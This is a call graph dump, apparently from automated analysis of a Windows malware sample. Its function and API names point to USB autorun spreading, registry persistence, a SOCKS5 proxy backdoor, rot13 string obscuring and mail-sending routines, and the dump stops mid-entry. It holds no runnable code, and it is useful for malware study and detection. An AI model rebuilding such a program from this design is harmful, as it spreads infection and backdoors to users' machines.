4846 4054e9 4845->4846 4847 40547e htons 4845->4847 4846->4840 4850 4053c2 gethostbyname 4847->4850 4851 4053f3 4850->4851 4852 4053e5 inet_addr 4850->4852 4853 405428 WSAConnect 4851->4853 4854 40540c memcpy 4851->4854 4852->4851 4853->4846 4854->4853 4855 10002209 memset GetSystemDirectoryA lstrlen 4856 1000224c lstrcat 4855->4856 4857 1000225f lstrcat 4855->4857 4856->4857 6047 401149 6048 401150 SetUnhandledExceptionFilter 6047->6048 6049 40116b 6048->6049 6050 401170 __getmainargs 6049->6050 6051 401210 __p__fmode 6050->6051 6052 4011ac 6050->6052 6055 401222 6051->6055 6053 401260 _setmode 6052->6053 6054 4011bf 6052->6054 6053->6054 6056 4011e3 6054->6056 6057 4011c4 _setmode 6054->6057 6059 40122a __p__environ 6055->6059 6056->6051 6058 4011e8 _setmode 6056->6058 6057->6056 6058->6051 6060 404076 176 API calls 6059->6060 6061 40124b _cexit ExitProcess 6060->6061 4858 1000140f swrite 6065 40bf50 TlsAlloc 6066 40bf80 GetLastError 6065->6066 6067 40bf63 6065->6067 6068 401350 IsBadHugeReadPtr 6069 401372 HeapFree 6068->6069 6070 40138e 6068->6070 6069->6070 4814 10002a16 rot13 CreateMutexA GetLastError 4859 40a858 4860 40a873 4859->4860 4861 40a864 4859->4861 4883 4090a0 4860->4883 4865 40bb20 4861->4865 4866 40bbb4 4865->4866 4867 40bb35 4865->4867 4930 40b0e0 4866->4930 4869 40bb40 4867->4869 4944 40b3b0 4867->4944 4870 40bbf0 GetLastError TlsGetValue SetLastError 4869->4870 4871 40bb4b 4869->4871 4870->4871 4873 40bc20 TlsSetValue 4870->4873 4876 40bb65 4871->4876 4912 40b6b0 4871->4912 4874 40bc3b GetLastError 4873->4874 4882 40bb89 4873->4882 4874->4882 4877 40bb6e 4876->4877 4878 40bc6f abort 4876->4878 4879 40b0e0 10 API calls 4877->4879 4880 40bb7e 4877->4880 4879->4880 4881 40b3b0 4 API calls 4880->4881 4880->4882 4881->4882 4882->4873 4955 40b460 4883->4955 4887 40915f 4889 40abd0 66 API calls 4887->4889 4888 4090e6 4888->4887 4982 40ace0 4888->4982 4891 40916e 4889->4891 4990 40a900 4891->4990 4892 40913e 4894 40ace0 66 API calls 4892->4894 4895 40914a 4894->4895 4897 40bb20 26 API calls 4895->4897 4897->4887 4899 409198 5003 408b00 4899->5003 4901 40920a 5029 40a580 4901->5029 4904 408b00 2 API calls 4906 4091da 4904->4906 4905 40920f 5035 40a3d0 4905->5035 4906->4905 5007 40a600 4906->5007 4914 40b6c1 4912->4914 4913 40b71f 4913->4876 4914->4913 4915 40b72c abort 4914->4915 4916 40b740 4915->4916 4917 40b759 4916->4917 4918 40b0e0 10 API calls 4916->4918 4919 40b764 4917->4919 4921 40b3b0 4 API calls 4917->4921 4918->4917 4920 40b7f0 GetLastError TlsGetValue SetLastError 4919->4920 4923 40b76f 4919->4923 4920->4923 4921->4919 4922 40b7d6 4922->4876 4923->4922 4924 40b6b0 14 API calls 4923->4924 4926 40b85c 4924->4926 4925 40b0e0 10 API calls 4925->4926 4926->4922 4926->4925 4927 40b3b0 4 API calls 4926->4927 4928 40b89f TlsSetValue 4926->4928 4927->4926 4928->4926 4929 40b8b6 GetLastError 4928->4929 4929->4926 4931 40b0f6 4930->4931 4932 40b0fe FindAtomA 4930->4932 4931->4867 4933 40b1a1 malloc 4932->4933 4934 40b2dc 4932->4934 4935 40b310 abort 4933->4935 4936 40b1b7 AddAtomA 4933->4936 4937 40b040 4 API calls 4934->4937 4940 40b301 4936->4940 4941 40b2bf 4936->4941 4938 40b2e1 4937->4938 4938->4867 4942 40b040 4 API calls 4940->4942 4941->4938 4943 40b2c5 ??3@YAXPAX FindAtomA 4941->4943 4942->4941 4943->4934 4945 40b3ce 4944->4945 4950 40b3d2 4944->4950 4946 40b409 InterlockedIncrement 4945->4946 4945->4950 4947 40b41b 4946->4947 4948 40b44e 4946->4948 4947->4950 4951 40b430 Sleep 4947->4951 4952 40b350 TlsAlloc 4948->4952 4950->4869 4951->4950 4951->4951 4953 40b390 GetLastError 4952->4953 4954 40b368 4952->4954 4953->4950 4954->4950 4956 40b4a0 4955->4956 4957 40b47c 4955->4957 4959 40b0e0 10 API calls 4956->4959 4958 40b483 4957->4958 4961 40b3b0 4 API calls 4957->4961 4960 40b4e0 GetLastError TlsGetValue SetLastError TlsSetValue 4958->4960 4962 4090db 4958->4962 4959->4957 4960->4962 4961->4958 4963 40abd0 4962->4963 4964 40b460 18 API calls 4963->4964 4965 40ac08 4964->4965 5044 40a9d0 4965->5044 4968 40ac2e 4969 40ac32 4968->4969 4970 40ac9b 4968->4970 5058 40b540 4969->5058 5066 40a430 4970->5066 4971 40ac56 4976 40b540 15 API calls 4971->4976 4978 40ac7e 4976->4978 4978->4888 4983 40a900 21 API calls 4982->4983 4984 40acf1 4983->4984 4985 40ad1e 4984->4985 4986 40a430 66 API calls 4984->4986 4985->4892 4987 40ad6c 4986->4987 4988 40a9d0 66 API calls 4987->4988 4989 40ad7b 4988->4989 4989->4892 4991 40b460 18 API calls 4990->4991 4992 40a938 4991->4992 4993 40a949 4992->4993 4996 40a97a TlsGetValue SetLastError 4992->4996 4994 40b540 15 API calls 4993->4994 4995 409173 4994->4995 4997 408940 4995->4997 4996->4993 4998 408956 4997->4998 5002 408992 4998->5002 5072 408730 4998->5072 5000 408981 5076 408870 5000->5076 5002->4899 5004 408b20 5003->5004 5005 408b48 5004->5005 5081 408a10 5004->5081 5005->4901 5005->4904 5008 40b460 18 API calls 5007->5008 5009 40a638 malloc 5008->5009 5010 40a690 5009->5010 5011 40a64e memset 5009->5011 5015 40a699 5010->5015 5087 40bed0 5010->5087 5012 40b540 15 API calls 5011->5012 5014 4091ea 5012->5014 5020 40a510 5014->5020 5015->5011 5018 40a430 64 API calls 5015->5018 5097 40c0e0 InterlockedDecrement 5015->5097 5018->5015 5021 40a9d0 66 API calls 5020->5021 5022 40a55a 5021->5022 5100 40b740 5022->5100 5025 40abd0 66 API calls 5026 40a56d 5025->5026 5027 40a430 66 API calls 5026->5027 5028 40a572 5027->5028 5030 40a9d0 66 API calls 5029->5030 5032 40a591 5030->5032 5031 40a430 66 API calls 5031->5032 5032->5031 5034 40abd0 66 API calls 5032->5034 5115 40bc80 5032->5115 5034->5032 5036 40b460 18 API calls 5035->5036 5037 40a408 abort 5036->5037 5039 40abd0 64 API calls 5037->5039 5040 40a425 abort 5039->5040 5041 40a430 5040->5041 5042 40a3d0 64 API calls 5041->5042 5043 40a445 5042->5043 5045 40b460 18 API calls 5044->5045 5046 40aa08 5045->5046 5050 40ab0a InterlockedIncrement 5046->5050 5052 40aa66 5046->5052 5053 40aa1e 5046->5053 5047 40b540 15 API calls 5048 40aa7b 5047->5048 5048->4968 5048->4971 5049 40aa34 TlsGetValue SetLastError 5051 40ab53 malloc 5049->5051 5049->5052 5050->5053 5051->5053 5054 40ab66 TlsSetValue 5051->5054 5052->5047 5053->5049 5053->5052 5057 40a430 60 API calls 5053->5057 5069 40a8b0 TlsAlloc 5053->5069 5054->5053 5056 40abba GetLastError 5054->5056 5056->5053 5057->5053 5059 40b570 5058->5059 5060 40b555 5058->5060 5061 40b0e0 10 API calls 5059->5061 5062 40b3b0 4 API calls 5060->5062 5064 40b55c 5060->5064 5061->5060 5062->5064 5063 40b5b0 TlsSetValue 5065 40ac46 5063->5065 5064->5063 5064->5065 5065->4888 5067 40a3d0 66 API calls 5066->5067 5068 40a445 5067->5068 5070 40a8c1 5069->5070 5071 40a8e6 GetLastError 5069->5071 5070->5053 5071->5053 5073 40873c 5072->5073 5074 40876e 5072->5074 5073->5074 5075 408760 abort 5073->5075 5074->5000 5075->5073 5077 4088d0 5076->5077 5078 408889 5076->5078 5077->5002 5079 4088f7 abort 5078->5079 5080 4088a0 5078->5080 5079->5080 5080->5002 5084 408a24 5081->5084 5086 408a57 5081->5086 5082 408870 abort 5083 408a79 5082->5083 5083->5004 5085 408a3e abort 5084->5085 5084->5086 5085->5084 5086->5082 5088 40bef3 5087->5088 5092 40a71c 5087->5092 5089 40bf04 InterlockedIncrement 5088->5089 5088->5092 5090 40bf16 5089->5090 5089->5092 5091 40bf20 Sleep 5090->5091 5090->5092 5091->5091 5091->5092 5092->5015 5093 40c080 InterlockedIncrement 5092->5093 5094 40c0a0 WaitForSingleObject 5093->5094 5095 40c099 5093->5095 5094->5095 5096 40c0bc InterlockedDecrement 5094->5096 5095->5015 5096->5015 5098 40c120 5097->5098 5099 40c0fb ReleaseSemaphore 5097->5099 5098->5015 5099->5098 5101 40b759 5100->5101 5102 40b81c 5100->5102 5104 40b764 5101->5104 5107 40b3b0 4 API calls 5101->5107 5103 40b0e0 10 API calls 5102->5103 5103->5101 5105 40b7f0 GetLastError TlsGetValue SetLastError 5104->5105 5106 40b76f 5104->5106 5105->5106 5108 40a565 5106->5108 5109 40b6b0 20 API calls 5106->5109 5107->5104 5108->5025 5111 40b85c 5109->5111 5110 40b0e0 10 API calls 5110->5111 5111->5108 5111->5110 5112 40b3b0 4 API calls 5111->5112 5113 40b89f TlsSetValue 5111->5113 5112->5111 5113->5111 5114 40b8b6 GetLastError 5113->5114 5114->5111 5116 40bd12 5115->5116 5119 40bc99 5115->5119 5117 40b740 25 API calls 5116->5117 5118 40bd1a 5117->5118 5118->5032 5120 40bd27 GetLastError TlsGetValue SetLastError 5119->5120 5121 40bd9f abort 5119->5121 5122 40b0e0 10 API calls 5119->5122 5123 40b3b0 TlsAlloc GetLastError InterlockedIncrement Sleep 5119->5123 5124 40bd53 TlsSetValue 5119->5124 5120->5119 5122->5119 5123->5119 5124->5119 5125 40bd6a GetLastError 5124->5125 5125->5119 4823 1000271b fopen 4824 1000274a 4823->4824 4825 1000273d fclose 4823->4825 4825->4824 5126 40285d lstrcat lstrcat 5137 404eae GetTickCount srand rand 5126->5137 5128 40289f lstrcat 5138 404eae GetTickCount srand rand 5128->5138 5130 4028c7 lstrcat 5131 402ecd 5130->5131 5133 402ed6 5131->5133 5134 402ebe Sleep 5131->5134 5139 404f0a 5131->5139 5145 405ee8 5133->5145 5134->5131 5137->5128 5138->5130 5140 404c38 5139->5140 5141 404f24 GetModuleHandleA 5140->5141 5142 404f5d InternetGetConnectedState 5141->5142 5143 404f3e LoadLibraryA 5141->5143 5144 404f7b 5142->5144 5143->5142 5143->5144 5144->5131 5146 40b460 18 API calls 5145->5146 5147 405f1a strchr GetProcessHeap 5146->5147 5162 409250 5147->5162 5149 405f4c 5174 4060aa DnsQuery_A 5149->5174 5151 405fac 5152 406020 5151->5152 5181 40619a memset GetSystemTime wsprintfA socket 5151->5181 5153 406092 5152->5153 5155 406030 GetProcessHeap HeapFree 5152->5155 5156 40606f 5152->5156 5157 40b540 15 API calls 5153->5157 5155->5155 5155->5156 5156->5153 5264 401394 IsBadHugeReadPtr 5156->5264 5158 402f1d 5157->5158 5163 40b460 18 API calls 5162->5163 5164 409288 5163->5164 5165 4092a3 malloc 5164->5165 5167 40931f 5164->5167 5165->5164 5166 4092d0 5165->5166 5168 40b540 15 API calls 5166->5168 5170 40a600 66 API calls 5167->5170 5169 4092db 5168->5169 5169->5149 5171 40932b 5170->5171 5172 40a510 66 API calls 5171->5172 5173 409352 5172->5173 5175 40618f 5174->5175 5180 4060fc 5174->5180 5175->5151 5176 40617c GlobalFree 5176->5175 5177 40610a GetProcessHeap RtlAllocateHeap 5178 406130 lstrcpy 5177->5178 5177->5180 5270 4013d8 5178->5270 5180->5176 5180->5177 5182 4062ec htons inet_addr 5181->5182 5183 40672e closesocket 5181->5183 5184 40633b connect 5182->5184 5185 40631b gethostbyname 5182->5185 5186 40673e 5183->5186 5184->5183 5188 40635e 5184->5188 5185->5183 5187 406331 5185->5187 5186->5151 5187->5184 5278 4067e0 memset recv 5188->5278 5191 40636e wsprintfA 5282 406788 lstrlen send 5191->5282 5194 40639f wsprintfA 5195 406788 6 API calls 5194->5195 5196 4063c2 5195->5196 5196->5183 5197 4063ca wsprintfA 5196->5197 5198 406788 6 API calls 5197->5198 5199 4063ed 5198->5199 5199->5183 5200 406788 6 API calls 5199->5200 5201 406405 5200->5201 5201->5183 5202 40640d wsprintfA 5201->5202 5286 406746 lstrlen send 5202->5286 5204 406430 5204->5183 5205 406438 wsprintfA 5204->5205 5287 406746 lstrlen send 5205->5287 5207 40645b 5207->5183 5208 406463 wsprintfA 5207->5208 5288 406746 lstrlen send 5208->5288 5210 406489 5210->5183 5289 406746 lstrlen send 5210->5289 5212 4064a1 5212->5183 5213 4064a9 wsprintfA 5212->5213 5290 406746 lstrlen send 5213->5290 5215 4064cc 5215->5183 5291 406746 lstrlen send 5215->5291 5217 4064e4 5217->5183 5218 4064ec lstrlen 5217->5218 5219 406502 5218->5219 5220 40669f 5218->5220 5292 406746 lstrlen send 5219->5292 5313 406746 lstrlen send 5220->5313 5223 406512 5223->5183 5293 406746 lstrlen send 5223->5293 5224 4066af 5224->5183 5314 406746 lstrlen send 5224->5314 5227 40652a 5227->5183 5231 406552 5227->5231 5232 406538 5227->5232 5228 4066c3 5228->5183 5229 4066c7 wsprintfA 5228->5229 5315 406746 lstrlen send 5229->5315 5295 406746 lstrlen send 5231->5295 5294 406746 lstrlen send 5232->5294 5233 406695 5233->5183 5237 406788 6 API calls 5233->5237 5236 406548 5236->5183 5296 406746 lstrlen send 5236->5296 5238 406704 5237->5238 5238->5183 5242 406788 6 API calls 5238->5242 5240 40657a 5240->5183 5241 406582 wsprintfA 5240->5241 5297 406746 lstrlen send 5241->5297 5244 406718 5242->5244 5244->5183 5246 40671c closesocket 5244->5246 5245 4065ab 5245->5183 5298 406746 lstrlen send 5245->5298 5246->5186 5248 4065c3 5248->5183 5249 4065cb wsprintfA 5248->5249 5299 406746 lstrlen send 5249->5299 5251 4065ee 5251->5183 5252 4065f6 wsprintfA 5251->5252 5300 406746 lstrlen send 5252->5300 5254 406619 5254->5183 5301 406746 lstrlen send 5254->5301 5256 406631 5256->5183 5302 4017f8 CreateFileA 5256->5302 5260 406666 5261 40667a GlobalFree 5260->5261 5262 40666a GlobalFree 5260->5262 5312 406746 lstrlen send 5261->5312 5262->5183 5265 4013d2 5264->5265 5266 4013b6 HeapFree 5264->5266 5267 409230 5265->5267 5266->5265 5268 409245 5267->5268 5269 40923d ??3@YAXPAX 5267->5269 5268->5153 5269->5268 5271 4013f5 5270->5271 5272 401431 5271->5272 5273 4013fc HeapFree 5271->5273 5274 401436 RtlAllocateHeap 5272->5274 5277 401473 5272->5277 5275 401466 5273->5275 5274->5275 5275->5180 5276 40151f RtlReAllocateHeap 5276->5275 5277->5275 5277->5276 5279 406835 5278->5279 5280 406366 5278->5280 5316 406856 lstrlen 5279->5316 5280->5183 5280->5191 5283 406397 5282->5283 5284 4067c6 5282->5284 5283->5183 5283->5194 5285 4067e0 4 API calls 5284->5285 5285->5283 5286->5204 5287->5207 5288->5210 5289->5212 5290->5215 5291->5217 5292->5223 5293->5227 5294->5236 5295->5236 5296->5240 5297->5245 5298->5248 5299->5251 5300->5254 5301->5256 5303 401860 GetFileSize GetProcessHeap RtlAllocateHeap 5302->5303 5304 40198b 5302->5304 5305 4018b1 ReadFile 5303->5305 5306 40189c CloseHandle 5303->5306 5311 406746 lstrlen send 5304->5311 5307 4018dd GetProcessHeap HeapFree CloseHandle 5305->5307 5308 40190e GlobalAlloc 5305->5308 5306->5304 5307->5304 5319 401996 5308->5319 5311->5260 5312->5233 5313->5224 5314->5228 5315->5233 5317 406896 5316->5317 5318 40687c sscanf 5316->5318 5317->5280 5318->5317 5320 4019be 5319->5320 5322 40195a GetProcessHeap HeapFree CloseHandle 5319->5322 5321 4019e3 SetLastError 5320->5321 5320->5322 5321->5322 5322->5304 5323 409660 5326 4094a0 5323->5326 5327 4094b3 strcmp 5326->5327 5328 4094c9 5326->5328 5327->5328 6075 409760 6076 4097b3 6075->6076 6077 409788 6075->6077 6078 4094a0 strcmp 6076->6078 6078->6077 6079 408b60 6080 40b460 18 API calls 6079->6080 6084 408b95 6080->6084 6081 40b540 15 API calls 6083 408dfa 6081->6083 6082 408d20 6085 408d77 6082->6085 6086 408f40 6082->6086 6084->6082 6091 408940 2 API calls 6084->6091 6098 408d8c 6084->6098 6087 409011 6085->6087 6088 408d7e 6085->6088 6089 408f47 6086->6089 6090 40905c 6086->6090 6092 40a430 66 API calls 6087->6092 6088->6098 6100 40901d 6088->6100 6096 408940 2 API calls 6089->6096 6089->6098 6093 40abd0 66 API calls 6090->6093 6094 408c28 6091->6094 6092->6100 6095 40906d 6093->6095 6097 408730 abort 6094->6097 6101 40a3d0 66 API calls 6095->6101 6102 408f6d 6096->6102 6116 408c3c 6097->6116 6098->6081 6099 409085 6104 40abd0 66 API calls 6099->6104 6100->6099 6103 40ace0 66 API calls 6100->6103 6101->6099 6105 408730 abort 6102->6105 6106 409047 6103->6106 6107 409093 6104->6107 6105->6098 6108 40bb20 26 API calls 6106->6108 6109 40a430 66 API calls 6107->6109 6108->6090 6111 40909f 6109->6111 6110 408c7c 6110->6082 6110->6098 6112 408c9e 6110->6112 6112->6098 6113 408ca7 6112->6113 6114 40b540 15 API calls 6113->6114 6115 408d08 6114->6115 6116->6098 6116->6110 6117 408a10 2 API calls 6116->6117 6118 408b00 2 API calls 6116->6118 6117->6116 6118->6116 6119 40a760 6120 40a77b 6119->6120 6121 40a76c 6119->6121 6123 4090a0 66 API calls 6120->6123 6122 40bb20 26 API calls 6121->6122 6122->6120 6124 40a78a 6123->6124 6125 40b460 18 API calls 6124->6125 6128 40a7c8 6125->6128 6126 40a820 ??3@YAXPAX 6127 40a82b 6126->6127 6130 40b540 15 API calls 6127->6130 6128->6126 6129 40a7ed 6128->6129 6132 40c080 3 API calls 6128->6132 6129->6127 6133 40c0e0 2 API calls 6129->6133 6131 40a836 6130->6131 6132->6129 6134 40a81a 6133->6134 6134->6126 6134->6127 6135 10001f26 6136 10001f39 rot13c 6135->6136 6137 10001f4d 6135->6137 6136->6136 6136->6137 6138 405f6a 6139 409230 ??3@YAXPAX 6138->6139 6140 405f7e 6139->6140 6141 405f90 6140->6141 6142 40bb20 26 API calls 6140->6142 6143 4060aa 8 API calls 6141->6143 6142->6141 6150 405fac 6143->6150 6144 406020 6145 406092 6144->6145 6147 406030 GetProcessHeap HeapFree 6144->6147 6148 40606f 6144->6148 6149 40b540 15 API calls 6145->6149 6146 40619a 46 API calls 6146->6150 6147->6147 6147->6148 6148->6145 6152 401394 2 API calls 6148->6152 6151 40609d 6149->6151 6150->6144 6150->6146 6153 406087 6152->6153 6154 409230 ??3@YAXPAX 6153->6154 6154->6145 6155 40156c 6156 40158a 6155->6156 6159 401648 6155->6159 6157 401621 HeapFree 6156->6157 6158 40159b RtlAllocateHeap 6156->6158 6157->6159 6158->6159 6160 4015ca 6158->6160 6160->6157 6161 40b56c 6162 40b570 6161->6162 6163 40b0e0 10 API calls 6162->6163 6164 40b575 6163->6164 6166 40b3b0 4 API calls 6164->6166 6168 40b55c 6164->6168 6165 40b5b0 TlsSetValue 6167 40b563 6165->6167 6166->6168 6168->6165 6168->6167 5346 10001236 5347 10001271 5346->5347 5348 1000124c send 5346->5348 5348->5347 5349 10001278 5348->5349 5349->5347 5349->5348 5350 403e78 5351 404c38 5350->5351 5352 403ea2 RegOpenKeyExA 5351->5352 5353 403ed3 RegSetValueExA RegCloseKey 5352->5353 5354 403f1f 5352->5354 5353->5354 6169 401778 6170 401797 6169->6170 6172 4017b5 6169->6172 6173 40165a 6170->6173 6174 401671 6173->6174 6175 401699 6173->6175 6176 4013d8 3 API calls 6174->6176 6177 4013d8 3 API calls 6175->6177 6178 401687 6176->6178 6179 4016b8 6177->6179 6178->6172 6179->6178 6180 4016c5 memmove 6179->6180 6180->6178 6181 40bf79 6182 40bf80 GetLastError 6181->6182 6183 1000153e 6184 1000157c 6183->6184 6185 1000154f Socks5SendCode 6183->6185 6185->6184 5355 409400 5356 409418 5355->5356 5357 409230 ??3@YAXPAX 5356->5357 5358 409420 5357->5358 5359 40c000 TlsSetValue 5360 40c022 5359->5360 5361 40c026 GetLastError 5359->5361 5362 401000 5363 40101e 5362->5363 5364 401061 5362->5364 5366 401080 5363->5366 5367 401025 5363->5367 5365 40102a signal 5364->5365 5364->5367 5368 401087 5364->5368 5370 4010bb signal 5365->5370 5373 401041 5365->5373 5366->5368 5369 4010e2 signal 5366->5369 5367->5365 5372 401071 5367->5372 5368->5373 5374 40108e signal 5368->5374 5371 401129 signal 5369->5371 5369->5373 5370->5373 5371->5373 5374->5373 5375 40110f signal 5374->5375 5375->5373 6186 409500 6187 4094a0 strcmp 6186->6187 6188 409518 6187->6188 6189 10001140 __dllonexit 5382 408e0c 5416 408e10 5382->5416 5383 408c81 5384 408d58 5383->5384 5385 408c9e 5383->5385 5401 408d8c 5383->5401 5389 408d77 5384->5389 5390 408f40 5384->5390 5387 408ca7 5385->5387 5385->5401 5386 40b540 15 API calls 5388 408dfa 5386->5388 5393 40b540 15 API calls 5387->5393 5391 409011 5389->5391 5392 408d7e 5389->5392 5394 408f47 5390->5394 5395 40905c 5390->5395 5396 40a430 66 API calls 5391->5396 5392->5401 5403 40901d 5392->5403 5398 408d08 5393->5398 5400 408940 2 API calls 5394->5400 5394->5401 5397 40abd0 66 API calls 5395->5397 5396->5403 5399 40906d 5397->5399 5404 40a3d0 66 API calls 5399->5404 5405 408f6d 5400->5405 5401->5386 5402 409085 5407 40abd0 66 API calls 5402->5407 5403->5402 5406 40ace0 66 API calls 5403->5406 5404->5402 5408 408730 abort 5405->5408 5409 409047 5406->5409 5410 409093 5407->5410 5408->5401 5411 40bb20 26 API calls 5409->5411 5412 40a430 66 API calls 5410->5412 5411->5395 5415 40909f 5412->5415 5413 408a10 2 API calls 5413->5416 5414 408b00 2 API calls 5414->5416 5416->5383 5416->5413 5416->5414 5417 402e0d lstrcat lstrcat 5428 404eae GetTickCount srand rand 5417->5428 5419 402e4f lstrcat 5429 404eae GetTickCount srand rand 5419->5429 5421 402e77 lstrcat lstrcat 5422 402ecd 5421->5422 5423 404f0a 3 API calls 5422->5423 5424 402ed6 5422->5424 5425 402ebe Sleep 5422->5425 5423->5422 5426 405ee8 128 API calls 5424->5426 5425->5422 5427 402f1d 5426->5427 5428->5419 5429->5421 4797 1000274e RegOpenKeyExA 4798 100027b8 lstrlen RegSetValueExA RegCloseKey 4797->4798 4799 1000278a RegOpenKeyExA 4797->4799 4800 100027ff 4798->4800 4799->4798 4799->4800 5436 10001451 socket 5437 10001491 Socks5SendCode 5436->5437 5438 100014b8 connect 5436->5438 5439 1000152f 5437->5439 5438->5439 5440 100014fa Socks5SendCode closesocket 5438->5440 5440->5439 4815 10001f57 RegOpenKeyExA 4816 10001f9c RegOpenKeyExA 4815->4816 4817 10001fcf RegQueryValueExA RegCloseKey 4815->4817 4816->4817 4818 10002019 4816->4818 4817->4818 5441 1000b659 5443 1000b82b 5441->5443 5444 1000b67b 5441->5444 5442 1000b7f7 VirtualProtect VirtualProtect 5442->5443 5443->5443 5444->5442 5445 1000b7c0 5444->5445 6190 408d19 6191 408d20 6190->6191 6192 408d77 6191->6192 6193 408f40 6191->6193 6194 409011 6192->6194 6195 408d7e 6192->6195 6196 408f47 6193->6196 6197 40905c 6193->6197 6198 40a430 66 API calls 6194->6198 6203 40901d 6195->6203 6211 408d8c 6195->6211 6201 408940 2 API calls 6196->6201 6196->6211 6199 40abd0 66 API calls 6197->6199 6198->6203 6200 40906d 6199->6200 6204 40a3d0 66 API calls 6200->6204 6205 408f6d 6201->6205 6202 409085 6207 40abd0 66 API calls 6202->6207 6203->6202 6206 40ace0 66 API calls 6203->6206 6204->6202 6208 408730 abort 6205->6208 6209 409047 6206->6209 6210 409093 6207->6210 6208->6211 6212 40bb20 26 API calls 6209->6212 6213 40a430 66 API calls 6210->6213 6215 40b540 15 API calls 6211->6215 6212->6197 6214 40909f 6213->6214 6216 408dfa 6215->6216 5446 10001a5b sread 5447 10001a9b 5446->5447 5448 10001ba2 5446->5448 5447->5448 5449 10001ab9 sread 5447->5449 5449->5448 5450 10001ae0 5449->5450 5450->5448 5451 10001afe sread 5450->5451 5451->5448 5452 10001b2d lstrcmp 5451->5452 5453 10001b75 swrite 5452->5453 5454 10001b55 lstrcmp 5452->5454 5453->5448 5454->5453 5455 40bc1c 5456 40bc20 TlsSetValue 5455->5456 5457 40bb97 5456->5457 5458 40bc3b GetLastError 5456->5458 5457->5455 5458->5457 5459 40a81c 5460 40a820 ??3@YAXPAX 5459->5460 5461 40a82b 5460->5461 5462 40b540 15 API calls 5461->5462 5463 40a836 5462->5463 5464 406e1c LoadLibraryA 5465 406e6e GetProcAddress 5464->5465 5468 406f09 5464->5468 5466 406e8a FreeLibrary 5465->5466 5467 406e9c 5465->5467 5466->5468 5469 404620 5 API calls 5467->5469 5470 406eba DeleteFileA 5469->5470 5471 406ef7 Sleep 5470->5471 5471->5468 6223 406f1c LoadLibraryA 6224 407136 6223->6224 6225 406f6f GetProcAddress 6223->6225 6226 406fa0 GetSystemDirectoryA lstrlen 6225->6226 6227 406f8b FreeLibrary 6225->6227 6228 406fe1 6226->6228 6229 406fce lstrcat 6226->6229 6227->6224 6230 404f82 30 API calls 6228->6230 6229->6228 6231 406fec _mbscat 6230->6231 6232 407044 6231->6232 6238 401b7e malloc fopen 6232->6238 6235 407056 DeleteFileA 6235->6224 6236 40706b memset CreateProcessA 6236->6224 6237 407101 WaitForSingleObject CloseHandle DeleteFileA 6236->6237 6237->6224 6239 401bb8 6238->6239 6242 401bba 6238->6242 6240 401c00 6239->6240 6241 401bc7 realloc 6239->6241 6244 401c0f ??3@YAXPAX fclose 6240->6244 6241->6242 6243 401bda fread 6241->6243 6242->6235 6242->6236 6243->6240 6243->6241 6244->6242 5472 40ba1e 5473 40ba20 5472->5473 5474 40b0e0 10 API calls 5473->5474 5475 40ba25 5474->5475 5476 40b9e2 5475->5476 5478 40b3b0 4 API calls 5475->5478 5477 40ba60 GetLastError TlsGetValue SetLastError 5476->5477 5479 40b9e9 5476->5479 5477->5479 5478->5476 5480 40ba11 5479->5480 5481 40b0e0 10 API calls 5479->5481 5483 40babc 5479->5483 5481->5483 5484 40b3b0 4 API calls 5483->5484 5486 40bac3 TlsSetValue 5483->5486 5484->5486 5485 40baf5 GetLastError 5485->5486 5486->5485 6261 402d1f lstrcat lstrcat 6272 404eae GetTickCount srand rand 6261->6272 6263 402d61 lstrcat 6273 404eae GetTickCount srand rand 6263->6273 6265 402d89 lstrcat 6266 402ecd 6265->6266 6267 404f0a 3 API calls 6266->6267 6268 402ed6 6266->6268 6269 402ebe Sleep 6266->6269 6267->6266 6270 405ee8 128 API calls 6268->6270 6269->6266 6271 402f1d 6270->6271 6272->6263 6273->6265 4448 10001060 4449 10001070 4448->4449 4450 100010b7 malloc 4448->4450 4461 10002ec6 4449->4461 4451 100010f7 _errno 4450->4451 4452 100010cc 4450->4452 4454 100010aa 4451->4454 4464 100030f0 4452->4464 4456 1000109c 4456->4454 4460 10001000 2 API calls 4456->4460 4459 100010e1 4459->4449 4460->4454 4462 10001086 4461->4462 4463 10002edb CreateThread CreateThread CreateThread CreateThread CreateThread 4461->4463 4462->4456 4469 10001000 4462->4469 4463->4462 4473 10002020 WSAStartup 4463->4473 4483 10002a60 rot13 add_system_direcroty rot13 add_system_direcroty 4463->4483 4487 10002ea8 copy_filez mutex_check copy_autoinf 4463->4487 4488 100029b8 rot13 add_system_direcroty autostart_bot 4463->4488 4490 10002cef memcpy rot13 rot13 get_dword 4463->4490 4465 100030fc 4464->4465 4466 10003090 4464->4466 4465->4459 4499 10001110 __dllonexit 4466->4499 4468 100030c6 4468->4459 4470 10001050 fflush 4469->4470 4472 10001011 ??3@YAXPAX 4469->4472 4470->4456 4472->4470 4474 1000205c socket 4473->4474 4475 100021f8 4473->4475 4474->4475 4476 10002086 htons rot13 Get_Reg_SZ 4474->4476 4476->4475 4477 1000211c Get_Reg_SZ 4476->4477 4477->4475 4478 10002151 rot13 rot13 bind 4477->4478 4479 100021ed closesocket 4478->4479 4480 1000219f listen 4478->4480 4479->4475 4480->4479 4481 100021bd accept 4480->4481 4481->4481 4482 100021db create_thread 4481->4482 4482->4481 4484 10002ad1 Sleep memset CreateProcessA 4483->4484 4484->4484 4485 10002b6e CopyFileA 4484->4485 4485->4484 4486 10002b93 4485->4486 4489 100029fd Sleep xsocks5 4488->4489 4489->4489 4491 10002d6b rot13 add_system_direcroty filetyt 4490->4491 4492 10002e9c 4490->4492 4491->4492 4493 10002db0 4491->4493 4494 10002db6 Sleep 4493->4494 4495 10002dca GetDriveTypeA 4493->4495 4494->4495 4495->4493 4496 10002de5 memset _mbscat lstrlen 4495->4496 4497 10002e2b lstrcat 4496->4497 4498 10002e3e _mbscat SetErrorMode CopyFileA SetFileAttributesA 4496->4498 4497->4498 4498->4493 4499->4468 6274 409920 6275 4094a0 strcmp 6274->6275 6276 409947 6275->6276 6277 40994b 6276->6277 6278 4094a0 strcmp 6276->6278 6278->6277 4796 10002c6c rot13 add_system_direcroty rot13 add_system_direcroty CopyFileA 5487 405c2c GetModuleFileNameA 5492 405850 5487->5492 5493 405885 5492->5493 5494 4058ca RegOpenKeyExA 5493->5494 5495 405a30 5494->5495 5496 405905 RegQueryValueExA 5494->5496 5505 405a3e 5495->5505 5496->5495 5497 40594c RegCloseKey 5496->5497 5497->5495 5498 40596a lstrlen 5497->5498 5499 405992 lstrlen 5498->5499 5500 40597f lstrlen 5498->5500 5501 4059c0 5499->5501 5502 4059ad lstrcat 5499->5502 5500->5499 5518 404eae GetTickCount srand rand 5501->5518 5502->5501 5504 4059dd lstrcpy lstrcat CopyFileA 5504->5495 5504->5501 5506 